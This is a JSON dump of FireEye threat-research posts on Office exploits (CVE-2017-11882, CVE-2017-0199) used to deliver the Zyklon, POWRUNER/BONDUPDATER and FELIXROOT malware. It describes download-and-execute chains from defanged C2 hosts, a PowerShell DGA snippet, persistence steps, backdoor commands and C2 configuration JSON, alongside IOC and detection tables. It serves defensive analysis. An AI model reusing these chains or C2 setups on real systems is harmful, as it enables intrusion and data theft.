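The canonical dotted form returned for a numeric host is what should be matched against IP block lists; matching the raw host string would miss 258476380, 0x0F68095C and 017.0150.011.0134 even though all three resolve to the same address.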
Table 2 lists the current detection and blocking capabilities by product.\n\n| Detection Name | Product | Action |\n|---|---|---|\n| POWERSHELL DOWNLOADER D (METHODOLOGY) | HX | Detect |\n| SUSPICIOUS POWERSHELL USAGE (METHODOLOGY) | HX | Detect |\n| POWERSHELL DOWNLOADER (METHODOLOGY) | HX | Detect |\n| SUSPICIOUS EQNEDT USAGE (METHODOLOGY) | HX | Detect |\n| TOR (TUNNELER) | HX | Detect |\n| SUSPICIOUS SVCHOST.EXE (METHODOLOGY) | HX | Detect |\n| Malware.Binary.rtf | EX/ETP/NX | Block |\n| Malware.Binary | EX/ETP/NX | Block |\n| FE_Exploit_RTF_CVE_2017_8759 | EX/ETP/NX | Block |\n| FE_Exploit_RTF_CVE201711882_1 | EX/ETP/NX | Block |\n\nTable 2: Current detection capabilities by FireEye products\n\n#### Indicators of Compromise\n\nThe analysis above is based on the representative samples shown in Table 3.\n\n| MD5 | Name |\n|---|---|\n| 76011037410d031aa41e5d381909f9ce | accounts.doc |\n| 4bae7fb819761a7ac8326baf8d8eb6ab | Courrier.doc |\n| eb5fa454ab42c8aec443ba8b8c97339b | doc.doc |\n| 886a4da306e019aa0ad3a03524b02a1c | Pause.ps1 |\n| 04077ecbdc412d6d87fc21e4b3a4d088 | words.exe |\n\nTable 3: Sample Zyklon lures and payloads\n\n##### Network Indicators\n\n * 154.16.93.182\n * 85.214.136.179\n * 178.254.21.218\n * 159.203.42.107\n * 217.12.223.216\n * 138.201.143.186\n * 216.244.85.211\n * 51.15.78.0\n * 213.251.226.175\n * 93.95.100.202\n * warnono.punkdns.top\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 
5.9}, "published": "2018-01-17T17:00:00", "type": "fireeye", "title": "Microsoft Office Vulnerabilities Used to Distribute Zyklon Malware in Recent Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8759"], "modified": "2018-01-17T17:00:00", "id": "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076", "href": "https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T00:18:23", "description": "Less than a week after Microsoft issued a patch for [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) on Nov. 14, 2017, FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East. We assess this activity was carried out by a suspected Iranian cyber espionage threat group, whom we refer to as APT34, using a custom PowerShell backdoor to achieve its objectives.\n\nWe believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014. 
This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. We assess that APT34 works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.\n\nAPT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts, sometimes coupled with social engineering tactics. In May 2016, we published a blog detailing a [spear phishing campaign](<https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html>) targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware. We now attribute that campaign to APT34. In July 2017, we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER, based on strings within the malware. The backdoor was delivered via a malicious .rtf file that exploited [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>).\n\nIn this latest campaign, APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER.\n\nThe full report on APT34 is available to our [MySIGHT customer community](<https://www.fireeye.com/products/isight-cyber-threat-intelligence-subscriptions.html>). APT34 loosely aligns with [public reporting related to the group \"OilRig\"](<https://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/>). 
As individual organizations may track adversaries using varied data sets, it is possible that our classifications of activity may not wholly align.\n\n#### CVE-2017-11882: Microsoft Office Stack Memory Corruption Vulnerability\n\nCVE-2017-11882 affects several versions of Microsoft Office and, when exploited, allows a remote attacker to run arbitrary code in the context of the current user as a result of improper handling of objects in memory. The vulnerability was patched by Microsoft on Nov. 14, 2017. A full proof of concept (POC) was publicly released a week later by the reporter of the vulnerability.\n\nThe vulnerability exists in the old Equation Editor (EQNEDT32.EXE), a component of Microsoft Office used to insert and evaluate mathematical formulas. The Equation Editor is embedded in Office documents using object linking and embedding (OLE) technology, and it runs as a separate process rather than as a child process of the Office application; this matters for detection, because the malicious child process is spawned by EQNEDT32.EXE rather than by the Office application. If a crafted formula is passed to the Equation Editor, it copies the formula data into a fixed-size stack buffer without properly checking the data length, which results in stack memory corruption. Because EQNEDT32.EXE was built with an older compiler and does not support address space layout randomization (ASLR), a mitigation that guards against the exploitation of memory corruption vulnerabilities, its code sits at a predictable address and the attacker can easily redirect program execution.\n\n#### Analysis\n\nAPT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a spear phishing email sent to the victim organization. The file exploits CVE-2017-11882: the overlong data overruns the stack buffer, and the function\u2019s saved return address is overwritten with the address of an existing instruction inside EQNEDT32.EXE. 
That address (displayed in Figure 1) points at the instruction at 00430c12, which calls the \u201cWinExec\u201d function from kernel32.dll; the command line WinExec receives comes from the attacker data copied onto the stack.\n\n \nFigure 1: Disassembly of overwritten function address\n\nAfter exploitation, the \u2018WinExec\u2019 function is successfully called to create a child process, \u201cmshta.exe\u201d, in the context of the currently logged-on user. The process \u201cmshta.exe\u201d downloads a malicious script from hxxp://mumbai-m[.]site/b.txt and executes it, as seen in Figure 2.\n\n \nFigure 2: Attacker data copied to corrupt stack buffer\n\n#### Execution Workflow\n\nThe malicious script goes through a series of steps to successfully execute and ultimately establish a connection to the command and control (C2) server. The full sequence of events starting with the exploit document is illustrated in Figure 3.\n\n \nFigure 3: CVE-2017-11882 and POWRUNER attack sequence\n\n 1. The malicious .rtf file exploits CVE-2017-11882.\n 2. The malware overwrites the saved return address with the address of an existing instruction from EQNEDT32.EXE.\n 3. The malware creates a child process, \u201cmshta.exe,\u201d which downloads a file from: hxxp://mumbai-m[.]site/b.txt.\n 4. b.txt contains a PowerShell command to download a dropper from: hxxp://dns-update[.]club/v.txt. The PowerShell command also renames the downloaded file from v.txt to v.vbs and executes the script.\n 5. The v.vbs script drops four components (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory: C:\\ProgramData\\Windows\\Microsoft\\java\\\n 6. v.vbs uses CertUtil.exe, a legitimate Microsoft command-line program installed as part of Certificate Services, to decode the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base, and drop hUpdateCheckers.ps1 and dUpdateCheckers.ps1 to the staging directory.\n 7. 
cUpdateCheckers.bat is launched and creates a scheduled task for GoogleUpdateschecker.vbs persistence.\n 8. GoogleUpdateschecker.vbs is executed after sleeping for five seconds.\n 9. cUpdateCheckers.bat and *.base are deleted from the staging directory.\n\nFigure 4 contains an excerpt of the v.vbs script pertaining to the Execution Workflow section.\n\n \nFigure 4: Execution Workflow Section of v.vbs\n\nAfter successful execution of the steps mentioned in the Execution Workflow section, the Task Scheduler will launch GoogleUpdateschecker.vbs every minute, which in turn executes the dUpdateCheckers.ps1 and hUpdateCheckers.ps1 scripts. These PowerShell scripts are final stage payloads \u2013 they include a downloader with domain generation algorithm (DGA) functionality and the backdoor component, which connect to the C2 server to receive commands and perform additional malicious activities. \n\n#### hUpdateCheckers.ps1 (POWRUNER)\n\nThe backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server. POWRUNER is executed every minute by the Task Scheduler. Figure 5 contains an excerpt of the POWRUNER backdoor.\n\n \nFigure 5: POWRUNER PowerShell script hUpdateCheckers.ps1\n\nPOWRUNER begins by sending a random GET request to the C2 server and waits for a response. The server will respond with either \u201cnot_now\u201d or a random 11-digit number. If the response is a random number, POWRUNER will send another random GET request to the server and store the response in a string. POWRUNER will then check the last digit of the stored random number response, interpret the value as a command, and perform an action based on that command. 
The command values and the associated actions are described in Table 1.\n\n| Command | Description | Action |\n|---|---|---|\n| 0 | Server response string contains batch commands | Execute batch commands and send results back to server |\n| 1 | Server response string is a file path | Check for file path and upload (PUT) the file to server |\n| 2 | Server response string is a file path | Check for file path and download (GET) the file |\n\nTable 1: POWRUNER commands\n\nAfter successfully executing the command, POWRUNER sends the results back to the C2 server and stops execution.\n\nThe C2 server can also send a PowerShell command to capture and store a screenshot of a victim\u2019s system. POWRUNER will send the captured screenshot image file to the C2 server if the \u201cfileupload\u201d command is issued. Figure 6 shows the PowerShell \u201cGet-Screenshot\u201d function sent by the C2 server.\n\n \nFigure 6: PowerShell screenshot functionality\n\n#### dUpdateCheckers.ps1 (BONDUPDATER)\n\nOne of the recent advancements by APT34 is the use of a DGA to generate subdomains. The BONDUPDATER script, which was named based on the hard-coded string \u201cB007\u201d, uses a custom DGA to generate subdomains for communication with the C2 server.\n\n#### DGA Implementation\n\nFigure 7 provides a breakdown of how an example domain (456341921300006B0C8B2CE9C9B007.mumbai-m[.]site) is generated using BONDUPDATER\u2019s custom DGA. Reading the subdomain left to right, its fields are:\n\n 1. A random number created using the following expression, which joins between one and six random two-digit values: $rnd = -join (Get-Random -InputObject (10..99) -Count (%{ Get-Random -InputObject (1..6)}));\n 2. A flag that is either 0 or 1. It is initially set to 0. If the first resolved domain IP address starts with 24.125.X.X, then it is set to 1.\n 3. A three-digit counter, initially set to 000, then incremented by 3 after every DNS request.\n 4. 
First 12 characters of system UUID.\n 5. \u201cB007\u201d hardcoded string.\n 6. Hardcoded domain \u201cmumbai-m[.]site\u201d\n\nBONDUPDATER will attempt to resolve the resulting DGA domain and will take the following actions based on the IP address resolution:\n\n 1. Create a temporary file in %temp% location\n * The file created will have the last two octets of the resolved IP addresses as its filename.\n 2. BONDUPDATER will evaluate the last character of the file name and perform the corresponding action found in Table 2.\n\nCharacter\n\n| \n\nDescription \n \n---|--- \n \n0\n\n| \n\nFile contains batch commands, it executes the batch commands \n \n1\n\n| \n\nRename the temporary file as .ps1 extension \n \n2\n\n| \n\nRename the temporary file as .vbs extension \n \nTable 2: BONDUPDATER Actions\n\nFigure 8 is a screenshot of BONDUPDATER\u2019s DGA implementation.\n\n \nFigure 8: Domain Generation Algorithm\n\nSome examples of the generated subdomains observed at time of execution include:\n\n143610035BAF04425847B007.mumbai-m[.]site\n\n835710065BAF04425847B007.mumbai-m[.]site\n\n376110095BAF04425847B007.mumbai-m[.]site\n\n#### Network Communication\n\nFigure 9 shows example network communications between a POWRUNER backdoor client and server.\n\n \nFigure 9: Example Network Communication\n\nIn the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with \u20180\u2019, POWRUNER sends another random GET request to receive an additional command string. 
The C2 server sends back a Base64-encoded response.\n\nIf the server had sent the string \u201cnot_now\u201d as the response, as shown in Figure 10, POWRUNER would have ceased any further requests and terminated its execution.\n\nFigure 10: Example \"not now\" server response\n\n#### Batch Commands\n\nPOWRUNER may also receive batch commands from the C2 server to collect host information from the system. This may include information about the currently logged-in user, the hostname, network configuration data, active connections, process information, local and domain administrator accounts, an enumeration of user directories, and other data. An example batch command is provided in Figure 11.\n\nFigure 11: Batch commands sent by POWRUNER C2 server\n\n#### Additional Use of POWRUNER / BONDUPDATER\n\nAPT34 has used POWRUNER and BONDUPDATER to target Middle East organizations as early as July 2017. In July 2017, a FireEye Web MPS appliance detected and blocked a request to retrieve and install an APT34 POWRUNER / BONDUPDATER downloader file. During the same month, FireEye observed APT34 target a separate Middle East organization using a malicious .rtf file (MD5: 63D66D99E46FB93676A4F475A65566D8) that exploited CVE-2017-0199. This file issued a GET request to download a malicious file from:\n\nhxxp://94.23.172.164/dupdatechecker.doc.\n\nAs shown in Figure 12, the script within the dupdatechecker.doc file attempts to download another file named dupdatechecker.exe from the same server. The file also contains a comment by the malware author that appears to be a taunt aimed at security researchers.\n\nFigure 12: Contents of dupdatechecker.doc script\n\nThe dupdatechecker.exe file (MD5: C9F16F0BE8C77F0170B9B6CE876ED7FB) drops both BONDUPDATER and POWRUNER. These files connect to proxychecker[.]pro for C2.\n\n#### Outlook and Implications\n\nRecent activity by APT34 demonstrates that they are a capable group with potential access to their own development resources. 
During the past few months, APT34 has been able to quickly incorporate exploits for at least two publicly known vulnerabilities (CVE-2017-0199 and CVE-2017-11882) to target organizations in the Middle East. We assess that APT34\u2019s efforts to continuously update their malware, including the incorporation of a DGA for C2, demonstrate the group\u2019s commitment to pursuing strategies to evade detection. We expect APT34 will continue to evolve their malware and tactics as they continue to pursue access to entities in the Middle East region.\n\n#### IOCs\n\n**Filename / Domain / IP Address** | **MD5 Hash or Description**\n---|---\nCVE-2017-11882 exploit document | A0E6933F4E0497269620F44A083B2ED4\nb.txt | 9267D057C065EA7448ACA1511C6F29C7\nv.txt/v.vbs | B2D13A336A3EB7BD27612BE7D4E334DF\ndUpdateCheckers.base | 4A7290A279E6F2329EDD0615178A11FF\nhUpdateCheckers.base | 841CE6475F271F86D0B5188E4F8BC6DB\ncUpdateCheckers.bat | 52CA9A7424B3CC34099AD218623A0979\ndUpdateCheckers.ps1 | BBDE33F5709CB1452AB941C08ACC775E\nhUpdateCheckers.ps1 | 247B2A9FCBA6E9EC29ED818948939702\nGoogleUpdateschecker.vbs | C87B0B711F60132235D7440ADD0360B0\nhxxp://mumbai-m[.]site | POWRUNER C2\nhxxp://dns-update[.]club | Malware Staging Server\nCVE-2017-0199 exploit document | 63D66D99E46FB93676A4F475A65566D8\n94.23.172.164:80 | Malware Staging Server\ndupdatechecker.doc | D85818E82A6E64CA185EDFDDBA2D1B76\ndupdatechecker.exe | C9F16F0BE8C77F0170B9B6CE876ED7FB\nproxycheker[.]pro | C2\n46.105.221.247 | Has resolved mumbai-m[.]site & hpserver[.]online\n148.251.55.110 | Has resolved mumbai-m[.]site and dns-update[.]club\n185.15.247.147 | Has resolved dns-update[.]club\n145.239.33.100 | Has resolved dns-update[.]club\n82.102.14.219 | Has resolved ns2.dns-update[.]club & hpserver[.]online & anyportals[.]com\nv7-hpserver.online.hta | E6AC6F18256C4DDE5BF06A9191562F82\ndUpdateCheckers.base | 3C63BFF9EC0A340E0727E5683466F435\nhUpdateCheckers.base | EEB0FF0D8841C2EBE643FE328B6D9EF5\ncUpdateCheckers.bat | FB464C365B94B03826E67EABE4BF9165\ndUpdateCheckers.ps1 | 635ED85BFCAAB7208A8B5C730D3D0A8C\nhUpdateCheckers.ps1 | 13B338C47C52DE3ED0B68E1CB7876AD2\ngoogleupdateschecker.vbs | DBFEA6154D4F9D7209C1875B2D5D70D5\nhpserver[.]online | C2\nv7-anyportals.hta | EAF3448808481FB1FDBB675BC5EA24DE\ndUpdateCheckers.base | 42449DD79EA7D2B5B6482B6F0D493498\nhUpdateCheckers.base | A3FCB4D23C3153DD42AC124B112F1BAE\ndUpdateCheckers.ps1 | EE1C482C41738AAA5964730DCBAB5DFF\nhUpdateCheckers.ps1 | E516C3A3247AF2F2323291A670086A8F\nanyportals[.]com | C2\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-07T12:00:00", "type": "fireeye", "title": "New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-0199"], "modified": "2017-12-07T12:00:00", "id": "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "href": "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-06T21:43:11", "description": "#### Campaign Details\n\nIn September 2017, FireEye identified the FELIXROOT backdoor as a payload in a campaign targeting Ukrainians and reported it to our intelligence customers. The campaign involved malicious Ukrainian bank documents, which contained a macro that downloaded a FELIXROOT payload, being distributed to targets.\n\nFireEye recently observed the same FELIXROOT backdoor being distributed as part of a newer campaign. This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities [CVE-2017-0199](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) and [CVE-2017-11882](<https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html>) to drop and execute the backdoor binary on the victim\u2019s machine. Figure 1 shows the attack overview.\n\n \nFigure 1: Attack overview\n\nThe malware is distributed via Russian-language documents (Figure 2) that are weaponized with known Microsoft Office vulnerabilities. In this campaign, we observed threat actors exploiting CVE-2017-0199 and CVE-2017-11882 to distribute malware. The malicious document used is named \u201cSeminar.rtf\u201d. It exploits CVE-2017-0199 to download the second stage payload from 193.23.181.151 (Figure 3). 
The downloaded file is weaponized with CVE-2017-11882.\n\nFigure 2: Lure documents\n\nFigure 3: Hex dump of embedded URL in Seminar.rtf\n\nFigure 4 shows the first payload trying to download the second stage Seminar.rtf.\n\nFigure 4: Downloading second stage Seminar.rtf\n\nThe downloaded Seminar.rtf contains an embedded binary file that is dropped in %temp% via the Equation Editor executable. This file drops the executable at %temp% (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9), which is used to drop and execute the FELIXROOT dropper component (MD5: 92F63B1227A6B37335495F9BCB939EA2).\n\nThe dropped executable (MD5: 78734CD268E5C9AB4184E1BBE21A6EB9) contains the compressed FELIXROOT dropper component in the Portable Executable (PE) binary overlay section. When it is executed, it creates two files: an LNK file that points to %system32%\\rundll32.exe, and the FELIXROOT loader component. The LNK file is moved to the startup directory. Figure 5 shows the command in the LNK file to execute the loader component of FELIXROOT.\n\nFigure 5: Command in LNK file\n\nThe embedded backdoor component is encrypted using a custom encryption scheme. The file is decrypted and loaded directly in memory without touching the disk.\n\n#### Technical Details\n\nAfter successful exploitation, the dropper component executes and drops the loader component. The loader component is executed via RUNDLL32.EXE. The backdoor component is loaded in memory and has a single exported function.\n\nStrings in the backdoor are encrypted using a custom algorithm that uses XOR with a 4-byte key. The decryption logic used for ASCII strings is shown in Figure 6.\n\nFigure 6: ASCII decryption routine\n\nThe decryption logic used for Unicode strings is shown in Figure 7.\n\nFigure 7: Unicode decryption routine\n\nUpon execution, a new thread is created in which the backdoor sleeps for 10 minutes. Then it checks whether it was launched by RUNDLL32.exe along with parameter #1. 
If the malware was launched by RUNDLL32.exe with parameter #1, then it proceeds with initial system triage before starting command and control (C2) network communications. Initial triage begins with connecting to Windows Management Instrumentation (WMI) via the \u201cROOT\\CIMV2\u201d namespace.\n\nFigure 8 shows the full operation.\n\nFigure 8: Initial execution process of backdoor component\n\nTable 1 shows the classes referenced from the \u201cROOT\\CIMV2\u201d and \u201cRoot\\SecurityCenter2\u201d namespaces.\n\n**WMI Classes**\n---\nWin32_OperatingSystem\nWin32_ComputerSystem\nAntiSpywareProduct\nAntiVirusProduct\nFirewallProduct\nWin32_UserAccount\nWin32_NetworkAdapter\nWin32_Process\n\nTable 1: Referenced classes\n\n#### WMI Queries and Registry Keys Used\n\n 1. SELECT Caption FROM Win32_TimeZone\n 2. SELECT CSNAME, Caption, CSDVersion, Locale, RegisteredUser FROM Win32_OperatingSystem\n 3. SELECT Manufacturer, Model, SystemType, DomainRole, Domain, UserName FROM Win32_ComputerSystem\n\nRegistry entries are read for potential administrative privilege escalation and proxy information.\n\n 1. Registry key \u201c**SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System**\u201d is queried to check the values **ConsentPromptBehaviorAdmin** and **PromptOnSecureDesktop**.\n 2. Registry key \u201c**Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\**\u201d is queried to gather proxy information from the values **ProxyEnable, Proxy: (NO), Proxy, ProxyServer**.\n\nTable 2 shows FELIXROOT backdoor capabilities. 
Each command is performed in an individual thread.\n\n**Command** | **Description**\n---|---\n0x31 | Fingerprint system via WMI and registry\n0x32 | Drop file and execute\n0x33 | Remote shell\n0x34 | Terminate connection with C2\n0x35 | Download and run batch script\n0x36 | Download file to machine\n0x37 | Upload file\n\nTable 2: FELIXROOT backdoor commands\n\nFigure 9 shows the log message decrypted from memory using the same mechanism shown in Figure 6 and Figure 7 for every command executed.\n\nFigure 9: Command logs after execution\n\n#### Network Communications\n\nFELIXROOT communicates with its C2 via HTTP and HTTPS POST requests. Data sent over the network is encrypted and arranged in a custom structure. All data is encrypted with AES, converted into Base64, and sent to the C2 server (Figure 10).\n\nFigure 10: POST request to C2 server\n\nAll other fields, such as User-Agent, Content-Type, and Accept-Encoding, that are part of the request / response header are XOR encrypted and present in the malware. The malware queries the Windows API to get the computer name, user name, volume serial number, Windows version, processor architecture and two additional values, which are \u201c1.3\u201d and \u201cKdfrJKN\u201d. The value \u201cKdfrJKN\u201d may be used as identification for the campaign and is found in the JSON object in the file (Figure 11).\n\nFigure 11: Host information used in every communication\n\nThe FELIXROOT backdoor has three parameters for C2 communication. 
Each parameter provides information about the task performed on the target machine (Table 3).\n\n**Parameter** | **Description**\n---|---\n\u2018u=\u2019 | This parameter contains target machine information in the following format: <Computer Name>, <User Name>, <Windows Versions>, <Processor Architecture>, <1.3>, < KdfrJKN >, <Volume Serial Number>\n\u2018&h=\u2019 | This parameter includes the information about the command executed and its results.\n\u2018&p=\u2019 | This parameter contains the information about data associated with the C2 server.\n\nTable 3: FELIXROOT backdoor parameters\n\n**Cryptography**\n\nAll data is transferred to C2 servers using AES encryption and the **IBindCtx** COM interface over HTTP or HTTPS. The AES key is unique for each communication and is encrypted with one of two RSA public keys. Figure 12 and Figure 13 show the RSA keys used in FELIXROOT, and Figure 14 shows the AES encryption parameters.\n\nFigure 12: RSA public key 1\n\nFigure 13: RSA public key 2\n\nFigure 14: AES encryption parameters\n\nAfter encryption, the ciphertext to be sent to the C2 is Base64 encoded. Figure 15 shows the structure used to send data to the server, and Figure 16 shows the structural representation of data used in C2 communications.\n\nFigure 15: Structure used to send data to server\n\nFigure 16: Structure used to send data to C2 server\n\nThe structure is converted to Base64 using the **CryptBinaryToStringA** function.\n\nThe FELIXROOT backdoor contains several commands for specific tasks. After execution of every task, the malware sleeps for one minute before executing the next task. Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all its footprints from the targeted machine:\n\n 1. Deletes the LNK file from the startup directory.\n 2. Deletes the registry key **HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open**.\n 3. Deletes the dropper components from the system.\n\n#### Conclusion\n\nCVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing. Threat actors will increasingly leverage these vulnerabilities in their attacks until they are no longer finding success, so organizations must ensure they are protected. At the time of writing, the FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat. We also advise that all industries remain on alert, as the threat actors involved in this campaign may eventually broaden the scope of their current targeting.\n\n#### Appendix\n\n##### Indicators of Compromise\n\n11227ECA89CC053FB189FAC3EBF27497 | Seminar.rtf\n---|---\n4DE5ADB865B5198B4F2593AD436FCEFF | Seminar.rtf\n78734CD268E5C9AB4184E1BBE21A6EB9 | Zam<RandomNumber>.doc\n92F63B1227A6B37335495F9BCB939EA2 | FELIXROOT Dropper\nDE10A32129650849CEAF4009E660F72F | FELIXROOT Backdoor\n\nTable 4: FELIXROOT IOCs\n\n##### Network Indicators of Compromise\n\n217.12.204.100/news\n\n217.12.204.100:443/news\n\n193.23.181.151/Seminar.rtf\n\nAccept-Encoding: gzip, deflate\n\ncontent-Type: application/x-www-form-urlencoded\n\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\n\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\n\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\n\nMozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET 
CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\n\n##### Configuration Files\n\n_Version 1:_\n\n{\"1\" : \"https://88.198.13.116:8443/xmlservice\",\"2\" : \"30\",\"4\" : \"GufseGHbc\",\"6\" : \"3\", \"7\" :\n\n\u201chttp://88.198.13.116:8080/xmlservice\"}\n\n_Version 2:_\n\n{\"1\" : \"https://217.12.204.100/news/\",\"2\" : \"30\",\"4\" : \"KdfrJKN\",\"6\" : \"3\", \"7\" :\n\n\"http://217.12.204.100/news/\"}\n\n##### FireEye Detections\n\nMD5 | Product | Signature | Action\n---|---|---|---\n11227ECA89CC053FB189FAC3EBF27497 | NX/EX/AX | Malware.Binary.rtf | Block\n4DE5ADB865B5198B4F2593AD436FCEFF | NX/EX/AX | Malware.Binary.rtf | Block\n78734CD268E5C9AB4184E1BBE21A6EB9 | NX/EX/AX | Malware.Binary | Block\n92F63B1227A6B37335495F9BCB939EA2 | NX/EX/AX | FE_Dropper_Win32_FELIXROOT_1 | Block\nDE10A32129650849CEAF4009E660F72F | NX/EX/AX | FE_Backdoor_Win32_FELIXROOT_2 | Block\n11227ECA89CC053FB189FAC3EBF27497 | HX | IOC | Alert\n4DE5ADB865B5198B4F2593AD436FCEFF | HX | IOC | Alert\n\nTable 5: FireEye Detections\n\n#### Acknowledgements\n\nSpecial thanks to Jonell Baltazar, Alex Berry and Benjamin Read for their contributions to this blog.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-26T10:00:00", "type": "fireeye", "title": "Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign", "bulletinFamily": "info", 
